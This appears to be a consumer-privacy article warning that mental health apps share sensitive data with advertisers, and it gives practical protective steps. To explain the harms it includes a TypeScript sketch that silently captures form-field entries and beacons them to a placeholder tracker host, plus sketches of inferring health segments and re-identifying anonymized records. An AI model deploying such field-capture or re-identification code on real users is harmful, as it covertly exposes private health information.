Your Therapy App Might Be Whispering Your Secrets to Advertisers: How to Protect Your Mental Health Data
Introduction: When Your Digital Safe Space Isn’t So Safe
Picture opening up to your therapist about your deepest fears and traumatic memories. Now imagine learning that those secrets, shared in confidence, may be passed along to a faceless corporation to make a few bucks on the side. It feels unforgivable, doesn’t it? Unfortunately, that’s exactly what’s happening to people using some of the most popular mental health apps.
As a scholar in digital health privacy and an advocate for ethical tech, I lose sleep over this trend. Apps like BetterHelp and Talkspace can provide real comfort and support, and many of us reach for a mood-tracking app when we’re feeling anxious. The convenience and benefits of these tools are not in doubt. But there is increasing evidence that some platforms treat user data, including deeply sensitive data, irresponsibly. Here’s a look at what’s happening, why it matters, and, most importantly, how to protect yourself.
The Ugly Truth: Data Sharing in the Mental Health App Marketplace
The Evidence Is Strong: You’re Not Being Paranoid
1. FTC Actions Speak Loudly:
In 2023, BetterHelp reached a settlement with the Federal Trade Commission (FTC) requiring it to pay $7.8 million for sharing consumers’ sensitive mental health data with third parties like Facebook and Snapchat for advertising purposes, in violation of its promises to keep such information confidential. The FTC alleged the company revealed users’ email addresses, IP addresses, and health questionnaire responses.
2. Independent Watchdog Findings: Researchers at the Mozilla Foundation have repeatedly flagged major mental health and prayer apps in their “Privacy Not Included” guide. Their investigations found apps sharing personal data such as mood logs, journal entries, medication names, and session frequency with numerous advertisers and data brokers, including Facebook/Meta, Google, AppsFlyer, and Braze.
3. The Pixel Problem: The widespread use of tracking pixels (like the infamous Meta Pixel) on therapy platforms and even hospital patient portals is a significant culprit. These snippets of code can capture URLs visited, button clicks, and even form field entries (like answers to intake questionnaires about depression or anxiety) before the user hits “submit.”
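To see why form answers can leak before “submit,” consider this minimal, hypothetical TypeScript sketch of what a tracking script embedded in a page can do. The function name, endpoint, and payload shape are invented for illustration and are not taken from any real vendor’s code:

```typescript
// Hypothetical sketch of how a third-party tracking script can observe
// form fields as the user fills them in, before "submit" is ever clicked.
// The endpoint, function name, and payload shape are invented examples.

function attachFieldTracker(endpoint: string): void {
  document.querySelectorAll<HTMLInputElement>("input, textarea").forEach((field) => {
    // "blur" fires whenever the user moves past a field, even if the
    // form is abandoned and never submitted.
    field.addEventListener("blur", () => {
      const payload = JSON.stringify({
        page: window.location.href,      // e.g. an intake questionnaire URL
        fieldName: field.name,           // e.g. a depression-screening question ID
        value: field.value,              // whatever the user typed or selected
        userAgent: navigator.userAgent,  // one of several linkable identifiers
      });
      // sendBeacon delivers the data quietly, even while the page unloads.
      navigator.sendBeacon(endpoint, payload);
    });
  });
}

// A third-party script tag could run this on every page of a therapy portal:
attachFieldTracker("https://tracker.example/collect");
```

Because the data leaves the page as soon as the user moves past each field, abandoning the form without submitting does not undo the disclosure.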
How Does This Data Sharing Actually Work? (The Technical Creepiness)
It’s rarely as blatant as an app emailing your session transcript to an ad agency. It’s more insidious:
The Data Brokers: Apps often send data to “middlemen” – data aggregators and brokers. These companies build intricate profiles by combining data from many sources (apps, websites, loyalty cards, public records).
Building Your “Invisible” Profile: Even if your name isn’t attached directly to your therapy session frequency, data brokers can link your device ID, IP address, or email to create a profile labeled something like “User ID XZY123.”
Inference is Key: Advertisers don’t necessarily see “User XZY123 had a therapy session about anxiety on Tuesday.” Instead, they see signals: “User XZY123 visited a mental health app daily, spent 45 mins per session, filled out a PHQ-9 depression screening scoring ‘severe,’ and recently searched for ‘panic attack symptoms’.” This is more than enough to infer sensitive mental health conditions, as the code sketch after this list illustrates.
The Ad Targeting: These inferences are then used to target you with highly specific, often manipulative ads: antidepressants, competing “natural” therapy services, “miracle” cures, or other products that prey on your vulnerability. You might see messages such as, “Feeling lonely and want to chat?”
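To make that inference step concrete, here is a minimal, hypothetical TypeScript sketch of how a broker-side system might turn behavioral signals into advertising “audience segments.” Every field name, threshold, and label is invented for illustration; no real broker’s schema is being described:

```typescript
// Hypothetical sketch of broker-side inference: raw behavioral signals in,
// an advertising "audience segment" out. Every field, threshold, and label
// here is an invented example.

interface UserSignals {
  userId: string;            // pseudonymous ID, e.g. "XZY123"
  dailyAppOpens: number;     // how often a mental health app is opened
  avgSessionMinutes: number;
  screeningScore?: number;   // e.g. a PHQ-9 result captured by a pixel
  recentSearches: string[];
}

function inferSegments(s: UserSignals): string[] {
  const segments: string[] = [];
  if (s.dailyAppOpens >= 1 && s.avgSessionMinutes > 30) {
    segments.push("high-engagement-mental-health");
  }
  // PHQ-9 scores of 20 or above are conventionally labeled "severe".
  if (s.screeningScore !== undefined && s.screeningScore >= 20) {
    segments.push("inferred-severe-depression"); // never stated by the user
  }
  if (s.recentSearches.some((q) => q.includes("panic attack"))) {
    segments.push("anxiety-interest");
  }
  return segments;
}

// "User XZY123" never told anyone they have depression, yet:
console.log(inferSegments({
  userId: "XZY123",
  dailyAppOpens: 1,
  avgSessionMinutes: 45,
  screeningScore: 22,
  recentSearches: ["panic attack symptoms"],
}));
// -> ["high-engagement-mental-health", "inferred-severe-depression", "anxiety-interest"]
```

Note that the user never states a diagnosis anywhere; the segment is derived entirely from behavior.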
Why is This Such a Big Deal? Beyond “Just Ads”
HIPAA Loopholes: This is critical. The Health Insurance Portability and Accountability Act (HIPAA) provides strong privacy protections – but only for specific “covered entities” (like your doctor’s office, hospital, or a traditional health insurer). Many mental health apps, especially those acting purely as platforms connecting users to therapists (rather than employing therapists to provide care directly), argue they fall outside HIPAA. They operate instead under general consumer privacy laws, which are far more permissive and riddled with loopholes when it comes to permission for data selling and data analytics.
Chilling Honesty Effect: If users fear their data may be sold, they are likely to withhold essential things from their therapist, rendering therapy less effective or, at worst, harmful. Trust is the foundation of the therapeutic relationship.
Discrimination Risk: Although it’s illegal to discriminate based on health status in many areas like employment and insurance, leaked data could be misused in harmful ways. This includes targeted predatory lending, housing discrimination, or social stigma.
Exploitation of Vulnerability: Using deeply personal mental health struggles to sell products is ethically repugnant. It preys on individuals when they may be least equipped to critically evaluate advertising.
Protecting Your Sanctuary: Practical Steps for Safer Use
Don’t despair! You can use digital mental health tools more safely with vigilance:
Scrutinize Privacy Policies (Look for These Red Flags):
“Third-Party Sharing for Marketing/Advertising”: This is a major warning sign.
Vague “Business Purposes” or “Analytics”: Ask for details. What data do they collect? Which third parties get this data? How do they use it?
Lack of Clear HIPAA Compliance Statement: If HIPAA applies to them, they should say so clearly. Look for direct phrases like “We are a HIPAA-covered entity” or “We follow HIPAA security and privacy rules.” If they mention “HIPAA-compliant when necessary” or avoid the topic, be careful.
Data Retention Policies: How long do they keep your chat logs or journal entries? Can you delete them permanently?
Lock Down Your Device and App Permissions:
Limit Ad Tracking: On iOS, go to Settings > Privacy & Security > Tracking and turn off “Allow Apps to Request to Track.” On Android, go to Settings > Privacy > Ads and opt out of Ads Personalization. Limiting ad tracking makes it harder for apps to follow your data across platforms.
Review App Permissions: Does a mood tracker really need access to your contacts, location, or camera? If a permission seems unnecessary, deny it.
Use Strong, Unique Passwords and Enable Two-Factor Authentication: This protects your account from being compromised.
Be Strategic About What You Share (Within the App): If the app allows it, and it doesn’t interfere with payment or communicating with your therapist, use a pseudonym.
Avoid Linking Social Media: Don’t log in with Facebook or Google if given the option; create a standalone account instead.
Think Before You Type: If you have serious privacy concerns, avoid including highly sensitive identifiers in text chats or journals when possible.
Investigate & Pick Wisely:
– Identify Pro-Privacy Stances: Look for apps that explicitly state they do not sell or share data for advertising purposes, and note endorsements from privacy organizations (but stay skeptical).
– Paid vs. Free: Free apps almost always depend on advertising revenue and are more likely to share your data than paid subscriptions, which often have stronger privacy models (but double-check!).
– Ask Your Therapist: If you connect with a therapist through an app, ask them what they know about the platform’s privacy practices and data security. They should know and care.
– Use Alternatives: Open-source apps (where the code can be inspected), or apps that commit to local data storage (where the data stays on your device), such as Bearable (symptom tracking) or Moodflow (mood journaling), can offer more privacy. Traditional in-person therapy remains the most private option.
Conclusion: Demand Better, Protect Yourself
The ease of using mental health apps shouldn’t mean we lose our basic privacy and respect. Sharing the intimate details of our therapy sessions or mental health struggles with advertisers isn’t just a privacy violation; it’s a betrayal of the therapeutic relationship itself.
As users, we need to stay informed, stay watchful, and speak up. Demand transparency from the apps you use. Read the fine print. Choose platforms that put your privacy first. Support regulatory efforts to close the loopholes that allow this exploitation.
Your mental health journey is deeply personal. You deserve tools that support you without secretly profiting from your vulnerability. Protect your inner world – it’s worth it.
FAQ: Your Burning Questions Answered
“Are all mental health apps sharing my data?”
No, absolutely not. Many reputable developers prioritize user privacy and operate ethically. The key is research. Don’t assume guilt, but don’t assume innocence either – verify.
“If they ‘anonymize’ the data, is it safe?”
Often, no. True anonymity is incredibly difficult to achieve with rich behavioral and health data. As shown in numerous studies, “anonymized” datasets can often be re-identified when combined with other available information. “De-identified” data used for advertising is rarely truly anonymous in a protective sense.
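For intuition, here is a minimal, hypothetical TypeScript sketch of a classic “linkage attack”: joining an anonymized health dataset to public records on quasi-identifiers (ZIP code, birth year, gender). All records and field names are invented. Latanya Sweeney’s well-known research showed that ZIP code, birth date, and gender alone uniquely identify a large share of the US population:

```typescript
// Hypothetical linkage attack: an "anonymized" dataset (no names) is
// joined to a public dataset on quasi-identifiers. All records invented.

interface AnonRecord { zip: string; birthYear: number; gender: string; diagnosis: string; }
interface PublicRecord { name: string; zip: string; birthYear: number; gender: string; }

const anonymized: AnonRecord[] = [
  { zip: "60614", birthYear: 1991, gender: "F", diagnosis: "severe depression" },
];

const voterRolls: PublicRecord[] = [
  { name: "Jane Doe", zip: "60614", birthYear: 1991, gender: "F" },
];

// Re-identify: find public records matching all three quasi-identifiers.
function reidentify(anon: AnonRecord, publicData: PublicRecord[]): string[] {
  return publicData
    .filter((p) => p.zip === anon.zip && p.birthYear === anon.birthYear && p.gender === anon.gender)
    .map((p) => p.name);
}

console.log(reidentify(anonymized[0], voterRolls));
// -> ["Jane Doe"]: a unique match re-attaches a name to the "anonymous" diagnosis.
```

The richer the behavioral data (session times, searches, screening scores), the easier this kind of matching becomes.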
“Can my employer or health insurance company get this data?”
Directly from the app? Unlikely, unless required by law (which is rare for therapy notes). Indirectly? Potentially, yes. If data brokers sell segments like “individuals with high anxiety scores” and your employer buys marketing data for “employee wellness” targeting, your inferred status could be part of a larger pool. There’s also risk if the app suffers a data breach.
“I think my data was shared improperly. What can I do?”
Contact the App: Demand an explanation and deletion of your data.
File a Complaint:
FTC (US): ReportFraud.ftc.gov
Your State Attorney General: Many have consumer protection divisions.
HHS Office for Civil Rights (OCR): If you believe HIPAA was violated (e.g., by a covered entity therapist using a non-compliant app). HHS.gov/OCR
GDPR (EU/UK): Contact your national Data Protection Authority (DPA).
“Is texting my therapist directly safer than using an app?”
Potentially, but not foolproof. Standard SMS texting is generally not encrypted and offers minimal privacy. Encrypted messaging apps (like Signal) are far more secure for direct communication, but ensure your therapist agrees and understands how to use it securely. Verify their preferred secure communication method.